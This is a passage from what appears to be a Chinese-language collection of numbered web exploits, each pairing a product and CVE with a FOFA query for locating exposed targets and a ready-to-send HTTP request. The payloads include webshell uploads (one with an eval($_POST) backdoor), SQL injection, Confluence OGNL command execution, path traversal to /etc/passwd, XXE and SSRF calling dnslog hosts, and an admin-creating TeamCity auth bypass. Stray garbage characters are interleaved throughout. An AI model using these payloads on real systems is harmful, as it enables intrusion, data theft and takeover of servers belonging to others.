9 e/ a/ ^; h: ^( X" dsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
3 k* M& A* |. G- @9 F
! x3 |. A+ @9 x1 J) }# h" d5 }$ ~% K% D4 z! S/ z
120. 北京百绰智能S40管理平台导入web.php任意文件上传0 i4 }2 \0 A: w* ?/ L
CVE-2024-1253- X3 N& N, f7 H2 F( A
FOFA:title="Smart管理平台"
+ w$ q: P3 l* m; r% G: _! q& EPOST /useratte/web.php? HTTP/1.1$ w+ D: M. x Y
Host: ip:port
! D" c+ s4 U; o+ N7 PCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db, M1 A2 b2 z h) I
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& l: b- u- Z7 _7 g/ `+ HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( T1 U) {& E% i# w, |' \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ C( {0 ~ L) Y" a9 vAccept-Encoding: gzip, deflate
5 `1 o9 H2 Y+ U& x* p6 U' O; }9 q. D1 }Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328, U0 m- E) d* a
Content-Length: 5974 X3 P; J; h$ [
Origin: https://ip:port
& t. v. s! ^% i! WReferer: https://ip:port/sysmanage/licence.php! x! f0 Z# n. y, D# f9 W2 W
Upgrade-Insecure-Requests: 1
: G+ ^5 e, Q9 U+ mSec-Fetch-Dest: document8 U( q+ d: }, s0 v5 n0 B; L
Sec-Fetch-Mode: navigate
" s# W7 r% q+ p0 k- A$ `Sec-Fetch-Site: same-origin) m! ]$ B1 w9 R
Sec-Fetch-User: ?1
: z6 i, H8 _/ U: ], x5 ~+ CTe: trailers- \! e }& `& L v* r6 B \
Connection: close) V; c, c* W6 ?: K/ ]
/ L2 N) L! N/ b9 [( z% j-----------------------------42328904123665875270630079328
* N. A, J; I# J. j# @Content-Disposition: form-data; name="file_upload"; filename="2.php" E, {! i( h6 B% s- X
Content-Type: application/octet-stream1 U, n* Z5 d* |# y% i+ P% C
- v( B0 u7 I# P" `2 S, R
<?php phpinfo()?>0 i) R3 x$ v! f2 F% e, G0 ^
-----------------------------42328904123665875270630079328; n- u3 W, g- F% q ~
Content-Disposition: form-data; name="id_type". j5 | x# ?/ V- F
! r" c3 m; ]" `$ G* Z1 H5 w3 P0 W% D1
0 b! |" W* {; A' \9 P" u; }-----------------------------42328904123665875270630079328* v0 u0 |( Z( d5 H! ~. H4 M, i; [$ I
Content-Disposition: form-data; name="1_ck" Y g/ }( {" w6 C5 Z- a( P
1 N% s9 a4 X8 b" i( F5 O6 @
1_radhttp- `' p) c5 P# _& q' P0 m" j
-----------------------------42328904123665875270630079328' c9 w; n0 A" b
Content-Disposition: form-data; name="mode": L- [" J9 [' u- ~' d
3 r6 Q- b( ~: {: H% Y+ dimport9 _0 e" w& S% G; j' h. x
-----------------------------423289041236658752706300793282 y; x+ U, a* R- [- A) D. j8 k$ H
: j+ {" h# x/ x& y0 X B
- H9 Q, k# U: a2 S( _% q3 c1 I) q文件路径/upload/2.php( l7 f. F) o3 Q0 Q
' A! h4 A+ `% K2 Y" Y* q9 ~- ^3 p121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' B: B; `; L6 b' bCVE-2024-1918, J7 A7 l( g( |% A3 r
FOFA:title="Smart管理平台"- y# ^; v0 n- ?# c6 I: w# C
POST /useratte/userattestation.php HTTP/1.1
" @4 S7 u; d- Y6 v) `0 nHost: 192.168.40.130:8443" t) I+ m; _! d' k+ F
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
* }! V) l T E/ T" J8 A* v$ DUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: f. ~* E6 k9 ^) E2 S# I: W1 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ v$ L3 }/ Q0 U# L, \$ LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l6 N- ~4 S. k0 }
Accept-Encoding: gzip, deflate- K/ v7 }# |& z
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328- R: ] [- Y: b
Content-Length: 592
8 U- l% s' b4 q& F( Z, _+ M" Y5 jOrigin: https://192.168.40.130:8443
6 p' I' q7 `* M& ?( C IUpgrade-Insecure-Requests: 1
1 ] n) v3 T5 u) d" Y% kSec-Fetch-Dest: document
+ G. @8 ?5 |; T# `" bSec-Fetch-Mode: navigate
# ]9 C9 H& {4 m8 ASec-Fetch-Site: same-origin+ k+ R) ^. W9 ~3 M; t1 C0 `* s# `$ B
Sec-Fetch-User: ?1
8 _7 K2 x2 Z W$ V# L) Z, T# ~1 xTe: trailers: R. b& `* q/ _9 @) L7 t
Connection: close: f8 ^8 D3 p* ^% ^
1 Y1 i ~5 ^; q3 e9 W) j- h& N9 Y: M
-----------------------------42328904123665875270630079328# `8 ^. F* u' f# c G0 {7 b% j
Content-Disposition: form-data; name="web_img"; filename="1.php"* g. f1 Y' r* D- V
Content-Type: application/octet-stream4 g# I+ X, C# B
; n) q7 U, r: o& X
<?php phpinfo();?>& P7 ]! H; F. C& L# s% d; O6 X+ J
-----------------------------42328904123665875270630079328# c7 V, W# B& @9 z6 k4 T
Content-Disposition: form-data; name="id_type"
2 ~+ L4 w% S. j$ N
4 h) z3 r% f; D- p3 }; U18 H! D' _& [- f! n! v
-----------------------------423289041236658752706300793280 D5 V. C- B% j. n. }
Content-Disposition: form-data; name="1_ck": T/ Y. @0 N+ V: w0 k$ O
% `9 @: m) U: k) R
1_radhttp& F9 x( d) H1 S. v6 v% K
-----------------------------42328904123665875270630079328- S$ p+ C7 l" I& ^: p4 ~
Content-Disposition: form-data; name="hidwel"
7 \% D; k( s: V+ r" ~
9 D+ K+ C' G0 ]8 Y. T! w; H `set
# Y7 Y) j! z* v" Q-----------------------------42328904123665875270630079328+ F+ F5 {1 g- g
5 M. e- g1 W1 {/ J/ L( m
& C! G4 H8 F. q' Lboot/web/upload/weblogo/1.php9 \ L3 \" L7 U. v
* { [2 p$ \/ j9 f/ b122. 北京百绰智能s200管理平台/importexport.php sql注入9 `8 z2 w5 J, r: T- m+ r
CVE-2024-27718FOFA:title="Smart管理平台"" o. f: @6 r8 e9 }+ d3 `
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()! }8 t7 d4 }* B$ w. q, Z( ]$ ~1 t/ z
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
7 U2 V1 n" \% G/ v! P tHost: x.x.x.x
; a! Q% u* _% a H9 U7 SCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0+ O" ~7 E7 X- m1 ^7 ]0 E2 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
, }1 A! `9 M ^! j4 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 R. c# x8 c* wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% n1 S) A" k' }. u, O
Accept-Encoding: gzip, deflate, br. b; y9 P4 T& ^
Upgrade-Insecure-Requests: 1
/ l6 o8 D, `! M V, J! lSec-Fetch-Dest: document
" ^6 j* P( T9 B2 a2 l$ rSec-Fetch-Mode: navigate5 x3 v2 ~/ o, v+ C" n) u2 v# W' L
Sec-Fetch-Site: none
4 s3 p1 {5 L3 s0 }0 eSec-Fetch-User: ?1# U( ~6 g. W: F6 |+ l9 c; i
Te: trailers( |9 d, E; g9 n M; X
Connection: close
) u% t& L- i, f1 \( d! ]6 i z, J0 D% k3 m) W( R9 f( z4 r9 }2 ^
, t! m: @ T7 o6 U" h8 w0 S123. Atlassian Confluence 模板注入代码执行# j8 K5 @ M9 V" E9 ]8 M- I3 p
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
* D& A- X7 P* x3 L: ZPOST /template/aui/text-inline.vm HTTP/1.1+ }4 n3 O* J& t6 B7 B ~
Host: localhost:8090
. @6 w' p5 ~- `* {2 k" k& mAccept-Encoding: gzip, deflate, br ^3 k8 L$ |; b
Accept: */*
: d. s/ K+ w0 }5 {; z# J& T- sAccept-Language: en-US;q=0.9,en;q=0.8
4 l% U. u- X- w0 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
6 b( R6 Z3 U. ZConnection: close# ?+ `' _/ Y) Q- G2 N# Q
Content-Type: application/x-www-form-urlencoded) }/ I* E$ _6 ~: \/ f
+ t8 R' u* E: v+ @
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, b9 D9 p5 {* B. d; @& W: f* z1 E; ]7 v+ a
: L/ y. B$ _0 G1 Z' e! r4 ^
124. 湖南建研工程质量检测系统任意文件上传5 b+ P6 B9 p; D# [9 S4 o/ P+ j
FOFA:body="/Content/Theme/Standard/webSite/login.css"$ d/ P9 q5 A( X5 j- @
POST /Scripts/admintool?type=updatefile HTTP/1.1& X6 n* F- P( s# s
Host: 192.168.40.130:8282
' X8 J( Q8 z4 J9 ?; v3 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% ~0 \* L0 O( S; k1 O, d" M- ]
Content-Length: 729 e2 C% o, ?' |5 t, e9 @! Z. }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
* q0 U6 L6 J) j D2 J# @4 O- WAccept-Encoding: gzip, deflate, br( h, D! w1 W& F5 e: Z! q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ q2 ] z( _, d! P
Connection: close& A U4 b+ I3 P/ w
Content-Type: application/x-www-form-urlencoded
, F" g# j* R7 }) \- {. N$ K0 H- \' T' G! ?$ F
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
& y* p9 E$ i% b5 C$ ?7 h
% d5 e) f; G, O+ K' k9 ^/ K! K( F+ h* z5 l) ?: C+ X# q7 {
http://192.168.40.130:8282/Scripts/abcgcg.aspx
6 v4 z& `: A6 q2 m( D! Y. B; G9 V* W: Z
125. ConnectWise ScreenConnect身份验证绕过
' _" f- d& K3 mCVE-2024-1709
$ S, h- k' ^* X2 W: W% lFOFA:icon_hash="-82958153"6 ~! t1 b, T7 a) H8 M' u
https://github.com/watchtowrlabs ... bypass-add-user-poc
3 N: P2 v2 v7 G; P) l/ f5 I
9 [6 S9 J. r. i; p
/ @- p$ Z9 h4 }$ M- B& A: t使用方法3 m; P5 o7 m- J
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
4 V7 O1 y8 o& A; I& l0 w
+ k( {$ A* z- `# M' {' S' q) H! e7 S q) v+ _
创建好用户后直接登录后台,可以执行系统命令。
* ^0 {) z1 x! i. k- ?) j* E% ^/ L/ p- H3 a$ W( W) S- Q1 @
126. Aiohttp 路径遍历& V2 z' ^, X) P. O! U+ c2 w
FOFA:title=="ComfyUI"
! f% b% z" N. UGET /static/../../../../../etc/passwd HTTP/1.1
5 }5 S/ s) d, Q6 ~; aHost: x.x.x.x
/ l. F$ l& X3 H: |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ W' m4 `: D' F7 `9 H' W
Connection: close
2 F+ M1 l' r: i% n# S* kAccept: */*# M$ n7 I2 `, T3 ]
Accept-Language: en% J& f% |$ k. o+ U2 p! {/ r
Accept-Encoding: gzip7 Z5 v9 F- g- `7 j/ {, v7 @6 y6 ?
+ T# {: x' i# S+ {1 s/ v. w0 N
$ W' w3 W0 d5 f' _127. 广联达Linkworks DataExchange.ashx XXE
& u. j& |0 j! Q% e0 z: ~FOFA:body="Services/Identification/login.ashx"
) W4 f6 Y ?1 [POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.13 e4 H, o% b: r( L6 Y# K8 C$ x" Q
Host: 192.168.40.130:8888" D/ w0 M3 I8 @- g) q1 P( I1 l; t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
1 N- [0 B# I, U g1 j$ PContent-Length: 4153 [% J! }8 Q: u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! x, @ p* k) n7 M5 L: z4 Z1 eAccept-Encoding: gzip, deflate1 X. o- M {6 b2 Z \
Accept-Language: zh-CN,zh;q=0.9
% Z$ M% n' z& l3 j kConnection: close9 Z0 @" l! o1 h* A9 W% P; r% }
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
# c+ ]0 ~5 ~' h+ r9 U5 ~0 kPurpose: prefetch
5 J8 O2 _4 U* z) D' K1 J/ ASec-Purpose: prefetch;prerender( U) d# z2 i& R) ^. F
& ~5 N! F* H) L
------WebKitFormBoundaryJGgV5l5ta05yAIe04 Y% y f# K# T1 V6 s' R
Content-Disposition: form-data;name="SystemName"
3 C% b, R: w3 d' }! d" I" ?$ z" }
- S8 `0 ] J* j Z! u+ dBIM9 |& v3 w9 E* N& g
------WebKitFormBoundaryJGgV5l5ta05yAIe0
' M+ u- U1 @' n3 P6 aContent-Disposition: form-data;name="Params"& x* l- Q( ^0 G, G. R! i9 H7 ?
Content-Type: text/plain
* j6 @, a6 `6 u
9 J4 v! n; H$ h& l3 @0 e<?xml version="1.0" encoding="UTF-8"?>; k6 M% N1 z7 d3 [; r. o
<!DOCTYPE test [
+ L4 M0 y; n9 ^2 q9 V* o<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">4 N7 B! \1 C% O% q
]% ^+ N3 B5 E. r: L
>+ g9 U2 ], [8 ~5 D7 O P6 ~
<test>&t;</test>8 H3 U1 u/ b- [7 ]3 f% f
------WebKitFormBoundaryJGgV5l5ta05yAIe0--$ l7 w7 S, M9 l0 J# Z4 [) z
$ h: q+ P+ r# A2 K9 ]8 e1 }
9 T$ o0 w6 ?3 j0 X' J& o' E4 t
. v, b8 B/ C& f! R128. Adobe ColdFusion 反序列化( t& D+ F1 X5 u4 i. u1 {$ E1 I
CVE-2023-38203) a# l! R5 ?) `- @. H# a
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
+ h" `3 s! Q. M( lFOFA:app="Adobe-ColdFusion"
1 L$ J4 R2 b8 yPAYLOAD
, s5 C9 T8 B7 G- D+ N$ g+ J; G- X, ^
129. Adobe ColdFusion 任意文件读取
4 V2 w5 l6 _0 d9 }, S4 G6 ^& WCVE-2024-20767
9 m+ N/ s* \7 |4 V# P2 |( O/ U$ sFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
+ j( h4 M! @, c7 Y3 F: B第一步,获取uuid8 j7 O# d C; v6 |4 z# `! U
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
2 ?( X+ D/ |" W, lHost: x.x.x.x
. V3 U+ s% L4 P9 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 |# A" [/ y$ P* `! V. C7 f0 R: BAccept: */*% ]4 b5 Z% k D/ y( _8 }
Accept-Encoding: gzip, deflate
/ s! x9 r# ?" I JConnection: close6 _1 H* S; H8 O& C
2 x+ q) ]6 e9 J. h' h
5 B+ `9 C) Y) t# `. d9 T% ^第二步,读取/etc/passwd文件' m- K2 G4 ]3 X" b0 ^9 g. Q, @4 p
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1# ]4 P3 w9 e3 i6 x% g1 A- s
Host: x.x.x.x
, d9 J6 Z( o8 g% c0 R# X' }9 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" c) N% \4 k$ d) {% u. t6 J8 i
Accept: */*
! k* y" U. ^' `: ^Accept-Encoding: gzip, deflate9 _/ Q- h7 @: ] y
Connection: close# T E' |% }! L3 k+ j
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
% @: ?6 {1 H7 u$ Q( X4 H6 U
1 J# k1 ]! N8 O" D+ q8 M7 J$ |
. o- n# f/ U1 U1 W# A0 M, r& ?, g130. Laykefu客服系统任意文件上传4 V1 u$ x$ }& O1 n' {
FOFA:icon_hash="-334624619"' g5 T0 W8 R- P7 l5 f I( q8 j
POST /admin/users/upavatar.html HTTP/1.1
9 k" b& @+ a FHost: 127.0.0.1
4 j# q9 o6 }4 ]5 L4 ZAccept: application/json, text/javascript, */*; q=0.01
1 ~ V e3 d; E! F& R2 JX-Requested-With: XMLHttpRequest
3 z9 k1 W8 V% g3 uUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
' E$ `5 D% {8 R# AContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR- Z' p: G" Q/ o7 t7 `9 |
Accept-Encoding: gzip, deflate, W, L- ^* x" i5 k! L3 _/ H( ]/ b
Accept-Language: zh-CN,zh;q=0.9
$ t: r9 @; D2 _+ X$ }% E3 K& m& QCookie: user_name=1; user_id=3
1 i8 u* o: C* z0 Z% iConnection: close$ G, U# m) K- V0 l- \
7 z2 U1 U6 o0 U$ |------WebKitFormBoundary3OCVBiwBVsNuB2kR! [7 |6 J6 }/ p* {
Content-Disposition: form-data; name="file"; filename="1.php"* S% l7 u9 ^% K8 h3 B! q) s
Content-Type: image/png7 r3 o7 N# J. m9 l6 \9 ?
7 g1 `, u& o- J1 m: j% `
<?php phpinfo();@eval($_POST['sec']);?>
" H- u4 g, f7 g# N# x$ x------WebKitFormBoundary3OCVBiwBVsNuB2kR--
, |3 U* H- l1 g( W; r( `, U; F0 s& T) b
: [; ~" X& T) k8 c4 {* e- j: U; w
131. Mini-Tmall <=20231017 SQL注入+ a$ g6 d% }& t" u; Y" h# D4 {
FOFA:icon_hash="-2087517259" E" Z4 I" J. b' A6 `4 m
后台地址:http://localhost:8080/tmall/admin0 x6 ~4 T* Z' h, Z& J; ~
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 l. N* z+ G- x: E) X1 \& p9 t7 V+ [; ~3 I) l$ Q% p
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过" v/ [8 G, L, x% s; f" I
CVE-2024-271988 |7 O; d+ W! x$ V2 [) `1 e
FOFA:body="Log in to TeamCity". b$ [% w& m$ s; Q) P
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
: w. b. |) n) m1 Y" wHost: 192.168.40.130:81114 f' c C2 z9 U$ B* m- ~1 w. y- u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36) ?5 Z! I8 k0 g3 N. }9 a5 W
Accept: */*
) J* l' f( E5 c; ~$ YContent-Type: application/json
8 g) U4 Z3 t0 y2 g/ J/ c+ k: V# s: ]" FAccept-Encoding: gzip, deflate
X# q3 J* y* s% K# l0 Q# N0 m, I' j) g( f$ B5 ?
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
( r; J" g8 r/ F8 p9 ^
; i* q* Q5 p5 n( I: z1 [9 w# Z& g! G( O$ ]/ s; {4 j# W9 B
CVE-2024-27199
3 ]+ n! l5 z! b, a4 \- Y. c; P3 E/res/../admin/diagnostic.jsp
* S, r; Q; C! @# ?/.well-known/acme-challenge/../../admin/diagnostic.jsp
6 W2 l( t8 Y7 x% U6 c4 N/update/../admin/diagnostic.jsp
% _9 V+ V6 g. k1 r2 o$ h; h* h: ?8 m& b
1 \$ e* s) v6 S _/ r" cCVE-2024-27198-RCE.py
3 I3 P$ G5 Y3 L* R, s1 x3 M- B& U' C0 ~. ~2 D
133. H5 云商城 file.php 文件上传
- L' [+ w3 P( j7 w# J) B! n8 c8 Y/ gFOFA:body="/public/qbsp.php"( J$ p8 Y- f# V1 g7 x
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 H5 q b' w& d2 W* f" gHost: your-ip
) ]) _" a% ]( C' T( R9 ~ \, tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: n8 ~1 Q9 x0 x# b& s& i) z0 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 _6 i! }) C( d1 x9 C! P# C3 d. q2 N4 B1 M1 D0 |4 f' v2 k9 f; h, }
------WebKitFormBoundaryFQqYtrIWb8iBxUCx/ D5 L9 k' T2 g$ _
Content-Disposition: form-data; name="file"; filename="rce.php"
% x& a. A* q2 s7 O- ?) B6 kContent-Type: application/octet-stream6 a8 d* s/ L, H' B% G5 F
* v D4 l8 e& f5 @2 E
<?php system("cat /etc/passwd");unlink(__FILE__);?>6 R6 |, p$ D# {) L6 _9 O: W" o
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
. c" b1 M, j% m0 V& U
9 i8 r9 y7 [ W9 F7 l7 H' z# ^8 j5 Z# T) O- X4 l
' y' `8 X& }5 m* d f) G2 V134. 网康NS-ASG应用安全网关index.php sql注入0 a' ?3 X( x% B H) G$ [) s; C
CVE-2024-23309 \. {; ]5 k. ` a5 z, d% Q. \
Netentsec NS-ASG Application Security Gateway 6.3版本2 d9 l$ m3 A/ }. u
FOFA:app="网康科技-NS-ASG安全网关"1 E9 m& t8 }8 i
POST /protocol/index.php HTTP/1.1
, D' a) e+ x6 q A4 NHost: x.x.x.x8 j# i3 I) g, R* Y5 |2 z
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
+ H9 [/ H& J+ P2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.02 g# [( a, I+ `& ~9 l
Accept: */*! m2 }8 Y% L+ c9 Y% e' M2 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- ~) L7 U- D& @5 A, m! }, a
Accept-Encoding: gzip, deflate) }7 q; U6 C2 D) M% @; A2 Z
Sec-Fetch-Dest: empty5 c* j, D- K! D- w. @$ G
Sec-Fetch-Mode: cors
$ i9 H' F3 {7 S" G- ~# e' ySec-Fetch-Site: same-origin
9 w: j9 J7 M- D% J. a$ y( P2 n: V# r" WTe: trailers
- a+ f. b; I- A. Z& K! E+ p# ^Connection: close
3 J) N' t* S' k" W( V& G$ }3 jContent-Type: application/x-www-form-urlencoded( S) p% p u! q) L) U
Content-Length: 263
/ C8 m6 r! Z/ N: F- H3 P7 h/ K) U9 I# @" v' v) @( b6 P9 ]
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}0 D. h7 }3 T, Y+ o4 h! Z2 a6 v
* g% N D& g) n* }
" R+ |1 M) n' Z( Z, C( X
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" J5 R( w `8 q8 U; B. G
CVE-2024-2022! e% e/ t/ u5 Z5 e, n2 G) S- a: f
Netentsec NS-ASG Application Security Gateway 6.3版本- ^* c+ p) f) `- C: [5 H
FOFA:app="网康科技-NS-ASG安全网关"
4 u/ V$ y1 p3 LGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1" C3 @% K3 D5 w: U4 i
Host: x.x.x.x7 m j. z2 X) n& `6 h, D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( L( z+ ~( ]9 N/ v1 w4 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( ?' Q- q, `* HAccept-Encoding: gzip, deflate) ^! Z( B6 Q9 |" {$ A
Accept-Language: zh-CN,zh;q=0.9
/ U3 y4 g( L) Q5 `' XConnection: close
+ ^6 n; h6 c8 s: r
; A' V* X9 R& G4 k, ~" G+ t* ]" ^7 {' Z( o; V9 D
136. NextChat cors SSRF
4 k* L: W# P/ }5 GCVE-2023-49785/ x: f! q6 ]8 f: D" c9 {5 b' e f) i
FOFA:title="NextChat"" w" I" X- a: } l
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
) V9 r+ T/ N( m1 c+ k2 q! Q2 Y2 |) MHost: x.x.x.x:10000* Y' v/ Y% |& N0 }0 A5 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) h3 b/ w8 Y0 S; K$ u( G! UConnection: close- f3 B8 _: E/ D* J8 A/ h. q' R
Accept: */*
! l# S7 w* m0 s- _+ L/ ^Accept-Language: en g0 J" l. J/ W: c
Accept-Encoding: gzip
8 J2 Q" R# z$ a7 c* g9 u9 Y. W; c/ y$ g7 l
( K& ?9 Z( V. O i) N$ }137. 福建科立迅通信指挥调度平台down_file.php sql注入& A U# y+ g& F) ~0 B% u$ F
CVE-2024-2620, m4 W0 `" [) ]; M# b
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 ?6 H2 r. l$ x) ~GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
7 C4 X+ N! @0 L- ~6 UHost: x.x.x.x5 H% h8 g: w9 J: }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 K1 p" P( N" |3 Z5 {% R$ A( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ m: L3 C, U) [* K: \) @7 S9 |: z" h9 OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' o& t7 F' A- g: `: ~9 R- v- X- U I- ~Accept-Encoding: gzip, deflate, br
$ ?% y4 f0 u& [3 E; Z/ ?% kConnection: close* n! }& z! x" i9 F2 [
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj; {, L& i: z1 D/ `' b
Upgrade-Insecure-Requests: 17 O8 k, J# z' X# m8 M9 [2 ?
: A8 R, G0 }7 N+ z% j
5 D; O/ T" T' u5 E% D8 l% Q! b' A# M' k138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
) L6 R; d3 O* H7 _6 H( D9 l/ ICVE-2024-2621, i' M% d% g( v6 r! J9 e
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
- }* X+ `5 E0 ?# Z" eGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
+ O' |" w5 J0 }0 J% n. QHost: x.x.x.x5 H+ X8 r* N1 s% O0 r/ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 G1 H+ Y4 j1 g: R2 B2 Q T# G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. Q; j m" j: {/ a6 C2 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( o5 X; [# W) y& O# H- d4 f
Accept-Encoding: gzip, deflate, br
% y' P6 o1 [8 K3 ~+ {) ?Connection: close
2 \; a- c% _2 i! M9 a# KUpgrade-Insecure-Requests: 10 P- U+ ?0 r- s# c0 X. ~
' ^/ U) Z+ v' Y: R- c
$ T, E& v; x# F- y, O139. 福建科立讯通信指挥调度平台editemedia.php sql注入4 s2 b* \/ @. D; d" K0 b7 o
CVE-2024-2622- `$ `7 g* ` o8 C; R$ R
